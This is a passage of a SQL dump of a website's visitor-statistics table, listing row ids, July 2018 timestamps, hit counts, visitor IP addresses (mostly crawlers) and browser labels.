5.163.255.173','other'),(267170,1530661374,1,1,0,0,'95.163.255.150','other'),(267171,1530661487,1,1,0,0,'95.163.255.93','other'),(267172,1530662365,1,1,0,0,'141.8.142.74','other'),(267173,1530663061,4,4,0,0,'216.244.66.241','other'),(267174,1530663468,1,1,0,0,'52.87.14.196','other'),(267175,1530664169,2,2,0,0,'141.8.142.74','other'),(267176,1530664444,1,1,0,0,'35.153.83.126','other'),(267177,1530664604,2,2,0,0,'216.244.66.241','other'),(267178,1530665145,1,1,0,0,'8.29.198.25','other'),(267179,1530665457,1,1,0,0,'52.87.14.196','other'),(267180,1530665471,2,0,2,0,'66.249.69.156',''),(267181,1530665511,1,1,0,0,'66.249.69.156','chrome'),(267182,1530665565,1,0,1,0,'66.249.69.158',''),(267183,1530665699,2,2,0,0,'178.154.171.88','other'),(267184,1530666519,1,1,0,0,'95.163.255.162','other'),(267185,1530666547,1,1,0,0,'95.163.255.197','other'),(267186,1530666595,1,1,0,0,'87.250.224.46','other'),(267187,1530666605,4,4,0,0,'141.8.142.74','other'),(267188,1530666717,1,1,0,0,'95.163.255.99','other'),(267189,1530666818,1,0,1,0,'66.249.69.156',''),(267190,1530667059,1,1,0,0,'178.154.200.41','other'),(267191,1530667220,2,2,0,0,'178.154.171.88','other'),(267192,1530667897,1,1,0,0,'35.153.83.126','other'),(267193,1530668620,1,1,0,0,'66.249.69.158','chrome'),(267194,1530668782,1,1,0,0,'207.46.13.26','other'),(267195,1530669615,1,1,0,0,'52.87.14.196','other'),(267196,1530669672,1,1,0,0,'178.154.171.88','other'),(267197,1530670503,1,1,0,0,'213.180.203.8','other'),(267198,1530670509,1,1,0,0,'87.250.224.46','other'),(267199,1530670544,1,1,0,0,'35.153.83.126','other'),(267200,1530671277,2,2,0,0,'216.244.66.241','other'),(267201,1530671577,2,2,0,0,'141.8.142.74','other'),(267202,1530671623,1,1,0,0,'8.29.198.27','other'),(267203,1530671714,1,1,0,0,'95.163.255.98','other'),(267204,1530671764,1,1,0,0,'95.163.255.153','other'),(267205,1530671988,1,1,0,0,'95.163.255.171','other'),(267206,1530671995,1,1,0,0,'95.163.255.187','other'),(267207,1530672021,1,1,0,0,'95.163.255.196','other'),(267208,1530672069,1,1,0,0,'95.163.255.99','other'),(267209,1530672232,1,1,0,0,'52.87.14.196','other'),(267210,1530672244,1,1,0,0,'13.66.205.121','other'),(267211,1530672945,1,1,0,0,'35.153.83.126','other'),(267212,1530673235,1,1,0,0,'178.154.171.88','other'),(267213,1530673257,1,1,0,0,'141.8.142.167','other'),(267214,1530673302,3,3,0,0,'141.8.142.74','other'),(267215,1530673575,1,1,0,0,'216.244.66.241','other'),(267216,1530674068,14,14,0,0,'148.251.120.201','other'),(267217,1530674206,1,1,0,0,'178.154.171.88','other'),(267218,1530674282,1,0,1,0,'66.249.69.201',''),(267219,1530674661,1,0,1,0,'66.249.69.195',''),(267220,1530674918,1,1,0,0,'173.249.24.45','firefox'),(267221,1530674985,1,1,0,0,'35.153.83.126','other'),(267222,1530675205,1,1,0,0,'216.244.66.241','other'),(267223,1530675416,1,1,0,0,'52.87.14.196','other'),(267224,1530675674,1,1,0,0,'141.8.142.74','other'),(267225,1530675991,1,1,0,0,'8.29.198.26','other'),(267226,1530676401,1,1,0,0,'35.153.83.126','other'),(267227,1530676636,4,4,0,0,'216.244.66.241','other'),(267228,1530676652,2,2,0,0,'178.154.171.88','other'),(267229,1530676703,1,1,0,0,'141.8.142.74','other'),(267230,1530676916,1,1,0,0,'87.250.224.46','other'),(267231,1530677361,1,1,0,0,'95.163.255.163','other'),(267232,1530677694,1,1,0,0,'35.153.83.126','other'),(267233,1530677809,2,2,0,0,'178.154.171.88','other'),(267234,1530678406,4,4,0,0,'141.8.142.74','other'),(267235,1530678998,1,1,0,0,'35.153.83.126','other'),(267236,1530679008,1,1,0,0,'216.244.66.241','other'),(267237,1530679437,2,2,0,0,'95.213.141.126','opera'),(267238,1530679852,2,2,0,0,'141.8.142.74','other'),(267239,1530680097,1,1,0,0,'54.36.149.43','other'),(267240,1530680199,1,1,0,0,'35.153.83.126','other'),(267241,1530680586,1,1,0,0,'52.87.14.196','other'),(267242,1530680588,2,2,0,0,'91.196.178.169','chrome'),(267243,1530680750,2,2,0,0,'178.154.171.88','other'),(267244,1530681246,1,1,0,0,'54.36.148.17','other'),(267245,1530681502,3,3,0,0,'141.8.142.74','other'),(267246,1530681571,2,2,0,0,'216.244.66.241','other'),(267247,1530681852,1,1,0,0,'54.36.148.99','other'),(267248,1530681915,1,1,0,0,'35.153.83.126','other'),(267249,1530682013,1,1,0,0,'54.36.149.2','other'),(267250,1530682391,1,1,0,0,'54.36.148.161','other'),(267251,1530682458,1,1,0,0,'54.36.148.216','other'),(267252,1530682469,1,1,0,0,'8.29.198.27','other'),(267253,1530682610,1,1,0,0,'178.154.171.88','other'),(267254,1530682665,1,1,0,0,'54.36.148.20','other'),(267255,1530682714,1,1,0,0,'130.180.212.206','other'),(267256,1530682817,1,1,0,0,'95.163.255.196','other'),(267257,1530682867,1,1,0,0,'52.87.14.196','other'),(267258,1530682986,1,1,0,0,'54.36.148.156','other'),(267259,1530683014,1,1,0,0,'95.163.255.151','other'),(267260,1530683048,1,1,0,0,'216.244.66.241','other'),(267261,1530683096,1,1,0,0,'95.163.255.185','other'),(267262,1530683135,1,1,0,0,'95.163.255.171','other'),(267263,1530683273,1,1,0,0,'54.36.149.43','other'),(267264,1530683491,1,1,0,0,'188.230.43.254','other'),(267265,1530683722,1,1,0,0,'52.53.201.78','chrome'),(267266,1530683761,1,1,0,0,'54.36.149.90','other'),(267267,1530683826,1,1,0,0,'178.154.171.88','other'),(267268,1530683954,1,1,0,0,'54.36.148.231','other'),(267269,1530684033,3,3,0,0,'141.8.142.74','other'),(267270,1530684055,1,1,0,0,'54.36.148.87','other'),(267271,1530684194,3,3,0,0,'216.244.66.241','other'),(267272,1530684210,1,1,0,0,'54.36.148.103','other'),(267273,1530684247,1,1,0,0,'35.153.83.126','other'),(267274,1530684494,1,1,0,0,'54.36.148.158','other'),(267275,1530684514,1,1,0,0,'178.92.244.216','chrome'),(267276,1530684673,1,1,0,0,'54.36.149.21','other'),(267277,1530684973,1,1,0,0,'52.87.14.196','other'),(267278,1530685093,1,1,0,0,'54.36.148.56','other'),(267279,1530685149,1,1,0,0,'54.36.148.242','other'),(267280,1530685303,2,2,0,0,'178.154.171.88','other'),(267281,1530685335,1,1,0,0,'54.36.148.165','other'),(267282,1530685385,1,1,0,0,'91.196.178.75','chrome'),(267283,1530685429,1,1,0,0,'35.153.83.126','other'),(267284,1530685530,1,1,0,0,'54.36.148.236','other'),(267285,1530685714,1,1,0,0,'54.36.149.96','other'),(267286,1530685986,1,1,0,0,'54.36.148.254','other'),(267287,1530686010,1,1,0,0,'54.36.148.68','other'),(267288,1530686030,2,2,0,0,'141.8.142.74','other'),(267289,1530686054,11,11,0,0,'204.12.208.10','other'),(267290,1530686241,3,3,0,0,'216.244.66.241','other'),(267291,1530686338,1,1,0,0,'54.36.149.48','other'),(267292,1530686392,1,1,0,0,'54.36.148.31','other'),(267293,1530686509,1,1,0,0,'54.36.148.102','other'),(267294,1530686573,1,1,0,0,'178.154.171.88','other'),(267295,1530686683,1,1,0,0,'37.9.113.182','other'),(267296,1530686718,1,1,0,0,'35.153.83.126','other'),(267297,1530686831,1,1,0,0,'8.29.198.26','other'),(267298,1530686922,1,1,0,0,'46.211.150.213','other'),(267299,1530686955,1,1,0,0,'54.36.148.114','other'),(267300,1530687049,1,1,0,0,'54.36.148.168','other'),(267301,1530687143,1,1,0,0,'54.36.149.105','other'),(267302,1530687356,1,1,0,0,'52.87.14.196','other'),(267303,1530687379,1,1,0,0,'54.36.149.74','other'),(267304,1530687644,1,1,0,0,'54.36.148.152','other'),(267305,1530687686,1,1,0,0,'54.36.149.60','other'),(267306,1530687804,5,5,0,0,'141.8.142.74','other'),(267307,1530687864,1,1,0,0,'54.36.149.40','other'),(267308,1530687900,1,1,0,0,'35.153.83.126','other'),(267309,1530687905,2,2,0,0,'178.154.171.88','other'),(267310,1530687934,2,2,0,0,'195.230.119.59','chrome'),(267311,1530688118,1,1,0,0,'54.36.148.212','other'),(267312,1530688215,1,1,0,0,'95.163.255.167','other'),(267313,1530688235,1,1,0,0,'95.163.255.187','other'),(267314,1530688332,1,1,0,0,'95.163.255.192','other'),(267315,1530688383,1,1,0,0,'54.36.148.153','other'),(267316,1530688419,1,1,0,0,'54.36.148.160','other'),(267317,1530688455,1,1,0,0,'95.163.255.179','other'),(267318,1530688494,1,1,0,0,'87.250.224.46','other'),(267319,1530688605,1,1,0,0,'95.163.255.94','other'),(267320,1530688613,1,1,0,0,'92.112.125.37','chrome'),(267321,1530688859,1,1,0,0,'141.8.142.74','other'),(267322,1530688968,1,1,0,0,'35.153.83.126','other'),(267323,1530689015,2,2,0,0,'91.196.178.69','chrome'),(267324,1530689079,4,4,0,0,'216.244.66.241','other'),(267325,1530689285,1,1,0,0,'52.87.14.196','other'),(267326,1530689308,1,1,0,0,'54.36.148.34','other'),(267327,1530689436,1,1,0,0,'54.36.148.38','other'),(267328,1530689527,1,1,0,0,'54.36.148.66','other'),(267329,1530689538,1,1,0,0,'157.55.39.97','other'),(267330,1530689667,1,1,0,0,'54.36.148.23','other'),(267331,1530689688,1,1,0,0,'54.36.148.243','other'),(267332,1530689994,2,2,0,0,'216.244.66.241','other'),(267333,1530690057,1,1,0,0,'35.153.83.126','other'),(267334,1530690150,1,1,0,0,'54.36.149.41','other'),(267335,1530690369,1,1,0,0,'37.9.113.132','other'),(267336,1530690371,1,1,0,0,'178.154.200.73','other'),(267337,1530691067,1,1,0,0,'195.128.182.20','chrome'),(267338,1530691086,1,1,0,0,'54.36.149.22','other'),(267339,1530691093,1,1,0,0,'35.153.83.126','other'),(267340,1530691123,1,1,0,0,'54.36.148.218','other'),(267341,1530691199,1,1,0,0,'52.87.14.196','other'),(267342,1530691722,1,1,0,0,'178.154.200.73','other'),(267343,1530692097,5,5,0,0,'216.244.66.241','other'),(267344,1530692104,1,1,0,0,'35.153.83.126','other'),(267345,1530692158,4,4,0,0,'91.196.178.171','chrome'),(267346,1530692159,1,1,0,0,'87.250.224.125','other'),(267347,1530692668,1,1,0,0,'54.36.148.254','other'),(267348,1530692836,1,1,0,0,'54.36.148.151','other'),(267349,1530692840,1,1,0,0,'54.36.148.43','other'),(267350,1530693117,1,1,0,0,'54.36.148.24','other'),(267351,1530693300,1,1,0,0,'8.29.198.25','other'),(267352,1530693376,1,1,0,0,'35.153.83.126','other'),(267353,1530693436,1,1,0,0,'52.87.14.196','other'),(267354,1530693453,1,1,0,0,'54.36.148.13','other'),(267355,1530693506,1,1,0,0,'54.36.148.70','other'),(267356,1530693724,1,1,0,0,'54.36.148.128','other'),(267357,1530693875,2,2,0,0,'54.36.148.28','other'),(267358,1530693916,1,1,0,0,'54.36.149.77','other'),(267359,1530693928,2,2,0,0,'95.163.255.152','other'),(267360,1530693932,1,1,0,0,'95.163.255.196','other'),(267361,1530694155,1,1,0,0,'95.132.229.137','chrome'),(267362,1530694277,1,1,0,0,'141.8.142.74','other'),(267363,1530694306,1,1,0,0,'91.229.121.2','chrome'),(267364,1530694607,1,1,0,0,'109.227.83.19','chrome'),(267365,1530694764,1,1,0,0,'193.19.119.15','firefox'),(267366,1530694931,1,1,0,0,'54.36.148.76','other'),(267367,1530694933,6,6,0,0,'216.244.66.241','other'),(267368,1530694946,3,3,0,0,'91.196.178.75','chrome'),(267369,1530694979,2,2,0,0,'130.180.216.250','chrome'),(267370,1530694980,1,1,0,0,'178.95.156.150','chrome'),(267371,1530695029,1,1,0,0,'54.36.148.254','other'),(267372,1530695173,1,1,0,0,'54.36.149.2','other'),(267373,1530695248,1,1,0,0,'52.87.14.196','other'),(267374,1530695288,1,1,0,0,'35.153.83.126','other'),(267375,1530695457,1,1,0,0,'54.36.148.154','other'),(267376,1530695812,1,1,0,0,'178.92.21.92','chrome'),(267377,1530695883,2,2,0,0,'91.196.178.75','chrome'),(267378,1530695938,1,1,0,0,'54.36.149.77','other'),(267379,1530696028,1,1,0,0,'91.196.177.46','firefox'),(267380,1530696038,1,1,0,0,'54.36.148.15','other'),(267381,1530696061,1,1,0,0,'178.154.171.88','other'),(267382,1530696225,1,1,0,0,'54.36.148.13','other'),(267383,1530696276,1,1,0,0,'35.153.83.126','other'),(267384,1530696342,1,1,0,0,'216.244.66.241','other'),(267385,1530696343,1,1,0,0,'91.196.178.175','chrome'),(267386,1530696556,1,1,0,0,'54.36.148.51','other'),(267387,1530696579,1,1,0,0,'54.36.148.209','other'),(267388,1530696713,1,1,0,0,'95.132.229.137','chrome'),(267389,1530696971,1,1,0,0,'54.36.149.6','other'),(267390,1530696983,1,1,0,0,'54.36.148.233','other'),(267391,1530696992,3,3,0,0,'85.10.206.20','other'),(267392,1530697005,1,1,0,0,'52.87.14.196','other'),(267393,1530697021,1,1,0,0,'54.36.148.128','other'),(267394,1530697183,1,1,0,0,'35.153.83.126','other'),(267395,1530697340,1,1,0,0,'178.154.171.88','other'),(267396,1530697600,1,0,1,0,'66.249.69.158',''),(267397,1530697674,1,1,0,0,'8.29.198.25','other'),(267398,1530697686,1,1,0,0,'54.36.149.13','other'),(267399,1530697733,1,1,0,0,'91.196.177.193','chrome'),(267400,1530697760,5,5,0,0,'216.244.66.241','other'),(267401,1530697896,1,1,0,0,'54.36.148.165','other'),(267402,1530697954,1,1,0,0,'91.196.178.90','chrome'),(267403,1530698086,1,1,0,0,'54.36.148.59','other'),(267404,1530698231,3,3,0,0,'141.8.142.74','other'),(267405,1530698296,1,1,0,0,'91.196.178.175','chrome'),(267406,1530698353,1,1,0,0,'35.153.83.126','other'),(267407,1530698384,1,1,0,0,'54.36.148.69','other'),(267408,1530698448,1,1,0,0,'54.36.148.136','other'),(267409,1530698573,2,2,0,0,'130.180.216.250','chrome'),(267410,1530698597,1,1,0,0,'180.76.15.154','other'),(267411,1530698698,1,1,0,0,'54.36.149.35','other'),(267412,1530699021,1,1,0,0,'37.9.113.110','other'),(267413,1530699054,1,1,0,0,'216.244.66.241','other'),(267414,1530699189,1,1,0,0,'95.163.255.168','other'),(267415,1530699191,1,1,0,0,'95.163.255.196','other'),(267416,1530699200,1,1,0,0,'141.8.142.74','other'),(267417,1530699312,1,1,0,0,'35.153.83.126','other'),(267418,1530699455,1,1,0,0,'54.36.149.75','other'),(267419,1530699548,1,1,0,0,'95.163.255.179','other'),(267420,1530699714,1,1,0,0,'54.36.148.228','other'),(267421,1530699981,1,1,0,0,'54.36.148.212','other'),(267422,1530700154,1,1,0,0,'54.36.149.30','other'),(267423,1530700242,4,4,0,0,'216.244.66.241','other'),(267424,1530700458,1,1,0,0,'54.36.149.107','other'),(267425,1530700764,1,1,0,0,'52.87.14.196','other'),(267426,1530700805,1,1,0,0,'54.36.148.187','other'),(267427,1530700951,1,1,0,0,'157.55.39.100','other'),(267428,1530701038,1,1,0,0,'54.36.148.41','other'),(267429,1530701040,1,1,0,0,'54.36.149.5','other'),(267430,1530701055,1,1,0,0,'141.8.142.74','other'),(267431,1530701079,1,1,0,0,'35.153.83.126','other'),(267432,1530701119,2,2,0,0,'54.36.148.235','other'),(267433,1530701279,1,1,0,0,'91.196.178.133','firefox'),(267434,1530701454,1,1,0,0,'157.55.39.102','other'),(267435,1530701569,1,1,0,0,'54.36.148.105','other'),(267436,1530701746,1,1,0,0,'54.36.149.101','other'),(267437,1530701881,1,1,0,0,'54.36.149.73','other'),(267438,1530701909,1,1,0,0,'37.9.113.101','other'),(267439,1530702183,1,1,0,0,'54.36.148.234','other'),(267440,1530702311,1,1,0,0,'54.36.148.88','other'),(267441,1530702477,1,1,0,0,'52.87.14.196','other'),(267442,1530702822,1,1,0,0,'35.153.83.126','other'),(267443,1530702875,1,1,0,0,'54.36.148.78','other'),(267444,1530702931,1,1,0,0,'180.76.15.135','other'),(267445,1530703081,1,1,0,0,'54.36.149.42','other'),(267446,1530703394,2,2,0,0,'146.185.158.24','chrome'),(267447,1530703510,1,1,0,0,'54.36.149.6','other'),(267448,1530703645,1,1,0,0,'54.36.149.49','other'),(267449,1530703737,1,1,0,0,'157.55.39.102','other'),(267450,1530703758,1,0,1,0,'66.249.69.158',''),(267451,1530703938,2,2,0,0,'141.8.142.74','other'),(267452,1530703939,3,3,0,0,'91.196.178.169','chrome'),(267453,1530703976,1,1,0,0,'54.36.149.96','other'),(267454,1530703996,1,1,0,0,'54.36.148.252','other'),(267455,1530704114,1,1,0,0,'178.62.208.24','chrome'),(267456,1530704148,1,1,0,0,'8.29.198.26','other'),(267457,1530704164,1,1,0,0,'54.36.148.249','other'),(267458,1530704267,1,1,0,0,'35.153.83.126','other'),(267459,1530704304,1,1,0,0,'91.196.178.176','chrome'),(267460,1530704324,1,1,0,0,'52.87.14.196','other'),(267461,1530704397,2,2,0,0,'216.244.66.241','other'),(267462,1530704415,1,1,0,0,'54.36.149.12','other'),(267463,1530704680,1,1,0,0,'54.36.148.67','other'),(267464,1530704807,1,1,0,0,'66.102.9.38','chrome'),(267465,1530704897,1,1,0,0,'157.55.39.102','other'),(267466,1530705058,1,1,0,0,'91.196.178.71','chrome'),(267467,1530705089,1,1,0,0,'95.163.255.151','other'),(267468,1530705313,1,1,0,0,'35.153.83.126','other'),(267469,1530705375,3,3,0,0,'216.244.66.241','other'),(267470,1530705679,2,2,0,0,'91.196.177.46','chrome'),(267471,1530705779,1,1,0,0,'54.36.148.38','other'),(267472,1530705862,1,1,0,0,'52.87.14.196','other'),(267473,1530705892,1,1,0,0,'54.36.149.43','other'),(267474,1530705945,1,1,0,0,'95.163.255.95','other'),(267475,1530705984,1,1,0,0,'54.36.148.227','other'),(267476,1530705992,1,1,0,0,'54.36.149.55','other'),(267477,1530706020,1,1,0,0,'95.163.255.93','other'),(267478,1530706178,1,1,0,0,'54.36.148.121','other'),(267479,1530706265,1,1,0,0,'54.36.148.179','other'),(267480,1530706366,1,1,0,0,'54.36.148.194','other'),(267481,1530706375,1,1,0,0,'35.153.83.126','other'),(267482,1530706383,1,1,0,0,'54.36.148.217','other'),(267483,1530706672,1,1,0,0,'207.46.13.26','other'),(267484,1530706701,1,1,0,0,'91.196.178.169','chrome'),(267485,1530706735,1,1,0,0,'77.111.247.11','chrome'),(267486,1530706778,1,1,0,0,'54.36.148.69','other'),(267487,1530706827,1,1,0,0,'54.36.149.29','other'),(267488,1530706966,1,1,0,0,'54.36.149.55','other'),(267489,1530706980,1,1,0,0,'178.217.214.19','firefox'),(267490,1530707130,1,1,0,0,'54.36.148.35','other'),(267491,1530707306,2,2,0,0,'91.196.178.75','chrome'),(267492,1530707309,1,1,0,0,'35.153.83.126','other'),(267493,1530707394,2,2,0,0,'91.196.177.46','chrome'),(267494,1530707398,1,1,0,0,'52.87.14.196','other'),(267495,1530707399,1,1,0,0,'54.36.148.28','other'),(267496,1530707457,2,2,0,0,'130.180.216.250','chrome'),(267497,1530707482,1,1,0,0,'199.58.86.209','other'),(267498,1530707545,1,1,0,0,'178.154.171.88','other'),(267499,1530707602,1,1,0,0,'37.9.113.182','other'),(267500,1530708082,2,2,0,0,'216.244.66.241','other'),(267501,1530708138,1,1,0,0,'54.36.148.73','other'),(267502,1530708175,1,1,0,0,'141.8.142.74','other'),(267503,1530708525,1,1,0,0,'8.29.198.26','other'),(267504,1530708629,1,1,0,0,'35.153.83.126','other'),(267505,1530708744,1,1,0,0,'54.36.148.80','other'),(267506,1530708775,2,2,0,0,'178.154.171.88','other'),(267507,1530708931,1,1,0,0,'52.87.14.196','other'),(267508,1530709077,1,1,0,0,'54.36.148.207','other'),(267509,1530709179,1,1,0,0,'54.36.148.108','other'),(267510,1530709248,1,1,0,0,'91.196.178.68','firefox'),(267511,1530709256,1,1,0,0,'66.249.69.156','chrome'),(267512,1530709335,1,0,1,0,'66.249.69.157',''),(267513,1530709514,1,1,0,0,'194.0.56.212','chrome'),(267514,1530709611,1,1,0,0,'54.36.149.15','other'),(267515,1530709712,1,1,0,0,'178.154.200.41','other'),(267516,1530709772,1,1,0,0,'54.36.148.50','other'),(267517,1530709817,1,1,0,0,'178.154.171.88','other'),(267518,1530709858,1,1,0,0,'54.36.148.101','other'),(267519,1530709929,1,0,1,0,'66.249.69.158',''),(267520,1530709952,1,0,1,0,'66.249.69.201',''),(267521,1530710098,1,1,0,0,'35.153.83.126','other'),(267522,1530710131,3,3,0,0,'141.8.142.74','other'),(267523,1530710140,1,1,0,0,'87.250.224.46','other'),(267524,1530710175,1,1,0,0,'54.36.148.113','other'),(267525,1530710230,1,1,0,0,'95.163.255.188','other'),(267526,1530710234,1,1,0,0,'95.163.255.159','other'),(267527,1530710333,1,1,0,0,'54.36.148.241','other'),(267528,1530710387,1,1,0,0,'54.36.148.247','other'),(267529,1530710734,3,3,0,0,'77.222.134.102','chrome'),(267530,1530710781,1,1,0,0,'216.244.66.241','other'),(267531,1530710789,1,1,0,0,'52.87.14.196','other'),(267532,1530710794,1,1,0,0,'54.36.148.243','other'),(267533,1530710803,1,1,0,0,'5.58.202.60','chrome'),(267534,1530710843,1,1,0,0,'54.36.148.114','other'),(267535,1530710859,1,1,0,0,'54.36.148.140','other'),(267536,1530711008,1,1,0,0,'54.36.149.95','other'),(267537,1530711115,1,1,0,0,'54.36.148.168','other'),(267538,1530711266,1,1,0,0,'35.153.83.126','other'),(267539,1530711286,3,3,0,0,'178.154.171.88','other'),(267540,1530711289,4,4,0,0,'141.8.142.74','other'),(267541,1530711466,1,0,1,0,'66.249.69.199',''),(267542,1530711661,1,1,0,0,'54.36.148.38','other'),(267543,1530711893,1,1,0,0,'54.36.148.245','other'),(267544,1530711987,1,0,1,0,'66.249.69.201',''),(267545,1530712033,1,1,0,0,'54.36.148.237','other'),(267546,1530712119,1,1,0,0,'54.36.148.182','other'),(267547,1530712220,1,1,0,0,'52.87.14.196','other'),(267548,1530712343,1,1,0,0,'91.196.177.46','chrome'),(267549,1530712507,1,1,0,0,'35.153.83.126','other'),(267550,1530713007,2,2,0,0,'216.244.66.241','other'),(267551,1530713112,1,1,0,0,'54.36.149.84','other'),(267552,1530713177,1,1,0,0,'141.8.142.74','other'),(267553,1530713617,1,1,0,0,'52.87.14.196','other'),(267554,1530713652,1,1,0,0,'54.36.148.91','other'),(267555,1530713764,1,1,0,0,'35.153.83.126','other'),(267556,1530713951,1,1,0,0,'54.36.148.200','other'),(267557,1530714027,2,2,0,0,'91.196.178.169','chrome'),(267558,1530714154,2,2,0,0,'141.8.142.74','other'),(267559,1530714175,1,1,0,0,'54.36.148.191','other'),(267560,1530714265,1,1,0,0,'54.36.148.113','other'),(267561,1530714424,1,1,0,0,'54.36.148.107','other'),(267562,1530714568,1,1,0,0,'77.37.207.233','msie'),(267563,1530714645,1,1,0,0,'54.36.148.140','other'),(267564,1530714716,1,1,0,0,'35.153.83.126','other'),(267565,1530714939,1,1,0,0,'178.154.171.88','other'),(267566,1530715007,1,1,0,0,'8.29.198.26','other'),(267567,1530715259,6,6,0,0,'216.244.66.241','other'),(267568,1530715632,1,1,0,0,'95.163.255.165','other'),(267569,1530715685,1,1,0,0,'95.163.255.185','other'),(267570,1530715828,1,1,0,0,'54.36.149.74','other'),(267571,1530715923,1,1,0,0,'35.153.83.126','other'),(267572,1530716082,1,0,1,0,'66.249.69.199',''),(267573,1530716090,1,1,0,0,'95.163.255.187','other'),(267574,1530716257,2,2,0,0,'37.9.113.182','other'),(267575,1530716313,1,1,0,0,'52.87.14.196','other'),(267576,1530716362,1,1,0,0,'54.36.148.138','other'),(267577,1530716377,2,2,0,0,'141.8.142.74','other'),(267578,1530716389,1,1,0,0,'95.163.255.98','other'),(267579,1530716467,1,1,0,0,'95.163.255.93','other'),(267580,1530716695,1,1,0,0,'178.154.171.88','other'),(267581,1530716761,1,1,0,0,'54.36.148.214','other'),(267582,1530716839,1,1,0,0,'180.76.15.34','other'),(267583,1530717024,1,1,0,0,'54.36.148.133','other'),(267584,1530717134,1,1,0,0,'54.36.148.224','other'),(267585,1530717143,1,1,0,0,'35.153.83.126','other'),(267586,1530717267,1,1,0,0,'52.87.14.196','other'),(267588,1530717423,1,1,0,0,'199.58.86.206','other'),(267589,1530717503,1,1,0,0,'46.133.30.90','firefox'),(267590,1530717762,1,1,0,0,'54.36.148.71','other'),(267591,1530717779,1,1,0,0,'54.36.149.12','other'),(267592,1530718056,1,1,0,0,'141.8.142.74','other'),(267593,1530718074,1,1,0,0,'35.153.83.126','other'),(267594,1530718164,2,2,0,0,'178.154.171.88','other'),(267595,1530718202,1,1,0,0,'107.167.109.128','other'),(267596,1530718217,2,2,0,0,'216.244.66.241','other'),(267597,1530718239,3,3,0,0,'95.133.238.51','chrome'),(267598,1530718540,1,1,0,0,'52.87.14.196','other'),(267599,1530718581,2,2,0,0,'151.80.41.169','other'),(267600,1530718586,1,1,0,0,'54.36.148.76','other'),(267601,1530718710,1,1,0,0,'54.36.148.123','other'),(267602,1530718742,1,1,0,0,'54.36.149.58','other'),(267603,1530719154,1,1,0,0,'35.153.83.126','other'),(267604,1530719362,1,1,0,0,'8.29.198.25','other'),(267605,1530719522,1,1,0,0,'54.36.148.200','other'),(267606,1530719830,1,1,0,0,'66.249.69.199','chrome'),(267607,1530719836,1,1,0,0,'52.87.14.196','other'),(267608,1530719999,1,1,0,0,'54.36.149.10','other'),(267609,1530720183,1,1,0,0,'91.196.178.75','firefox'),(267610,1530720291,3,3,0,0,'141.8.142.74','other'),(267611,1530720292,1,1,0,0,'54.36.149.84','other'),(267612,1530720299,1,1,0,0,'35.153.83.126','other'),(267613,1530720419,1,1,0,0,'54.36.149.3','other'),(267614,1530720620,1,1,0,0,'54.36.149.17','other'),(267615,1530720671,2,2,0,0,'37.9.113.182','other'),(267616,1530720804,1,1,0,0,'54.36.148.22','other'),(267617,1530720843,1,1,0,0,'95.132.135.245','firefox'),(267618,1530720921,1,1,0,0,'91.196.178.66','chrome'),(267619,1530721194,1,1,0,0,'95.163.255.158','other'),(267620,1530721235,1,1,0,0,'35.153.83.126','other'),(267621,1530721442,1,1,0,0,'52.87.14.196','other'),(267622,1530721505,2,2,0,0,'216.244.66.241','other'),(267623,1530721531,1,1,0,0,'54.36.149.1','other'),(267624,1530721681,1,0,1,0,'66.249.69.199',''),(267625,1530721784,1,1,0,0,'54.36.148.46','other'),(267626,1530721983,2,2,0,0,'54.36.148.17','other'),(267627,1530722025,1,1,0,0,'95.163.255.96','other'),(267628,1530722026,1,1,0,0,'54.36.148.186','other'),(267629,1530722036,2,2,0,0,'91.196.178.187','chrome'),(267630,1530722046,1,1,0,0,'54.36.148.171','other'),(267631,1530722244,1,1,0,0,'35.153.83.126','other'),(267632,1530722401,1,1,0,0,'54.36.148.31','other'),(267633,1530722662,1,1,0,0,'37.9.113.182','other'),(267634,1530722666,1,1,0,0,'141.8.132.19','other'),(267635,1530722704,2,2,0,0,'216.244.66.241','other'),(267636,1530722794,1,1,0,0,'54.36.148.92','other'),(267637,1530722876,1,1,0,0,'54.36.148.117','other'),(267638,1530722992,1,1,0,0,'178.154.171.88','other'),(267639,1530723027,1,1,0,0,'141.8.142.74','other'),(267640,1530723299,1,1,0,0,'35.153.83.126','other'),(267641,1530723313,1,1,0,0,'52.87.14.196','other'),(267642,1530723729,1,1,0,0,'54.36.148.174','other'),(267643,1530723897,1,1,0,0,'54.36.148.108','other'),(267644,1530723946,1,1,0,0,'54.36.149.91','other'),(267645,1530723949,3,3,0,0,'216.244.66.241','other'),(267646,1530723985,1,1,0,0,'54.36.148.109','other'),(267647,1530724225,1,1,0,0,'35.153.83.126','other'),(267648,1530724323,1,1,0,0,'141.8.142.74','other'),(267649,1530724375,1,1,0,0,'54.36.148.91','other'),(267650,1530724463,1,1,0,0,'52.87.14.196','other'),(267651,1530724695,1,1,0,0,'54.36.149.12','other'),(267652,1530724927,1,1,0,0,'54.36.149.45','other'),(267653,1530725143,1,1,0,0,'35.153.83.126','other'),(267654,1530725466,1,1,0,0,'54.36.148.215','other'),(267655,1530725724,1,1,0,0,'54.36.148.223','other'),(267656,1530725788,9,9,0,0,'62.138.2.243','other'),(267657,1530725854,1,1,0,0,'8.29.198.25','other'),(267658,1530726207,1,1,0,0,'35.153.83.126','other'),(267659,1530726218,1,1,0,0,'52.87.14.196','other'),(267660,1530726359,1,1,0,0,'180.76.15.138','other'),(267661,1530726371,2,2,0,0,'216.244.66.241','other'),(267662,1530726542,1,1,0,0,'87.250.224.46','other'),(267663,1530726564,1,1,0,0,'95.163.255.181','other'),(267664,1530726601,1,1,0,0,'95.163.255.192','other'),(267665,1530726611,2,2,0,0,'92.113.189.235','chrome'),(267666,1530726806,1,1,0,0,'95.163.255.175','other'),(267667,1530727102,1,1,0,0,'95.163.255.151','other'),(267668,1530727169,1,1,0,0,'35.153.83.126','other'),(267669,1530727529,1,1,0,0,'95.163.255.93','other'),(267670,1530727530,1,1,0,0,'54.36.148.231','other'),(267671,1530727548,1,1,0,0,'188.230.43.254','other'),(267672,1530727680,1,1,0,0,'52.87.14.196','other'),(267673,1530727789,1,1,0,0,'91.196.178.68','firefox'),(267674,1530727799,3,3,0,0,'157.55.39.97','other'),(267675,1530727804,2,2,0,0,'157.55.39.100','other'),(267676,1530727808,3,3,0,0,'157.55.39.102','other'),(267677,1530727957,1,1,0,0,'216.244.66.241','other'),(267678,1530728158,1,1,0,0,'35.153.83.126','other'),(267679,1530728236,1,1,0,0,'141.8.142.74','other'),(267680,1530728545,1,1,0,0,'54.36.148.154','other'),(267681,1530728695,1,1,0,0,'77.111.247.63','chrome'),(267682,1530728711,2,2,0,0,'91.121.83.160','chrome'),(267683,1530728724,1,1,0,0,'52.87.14.196','other'),(267684,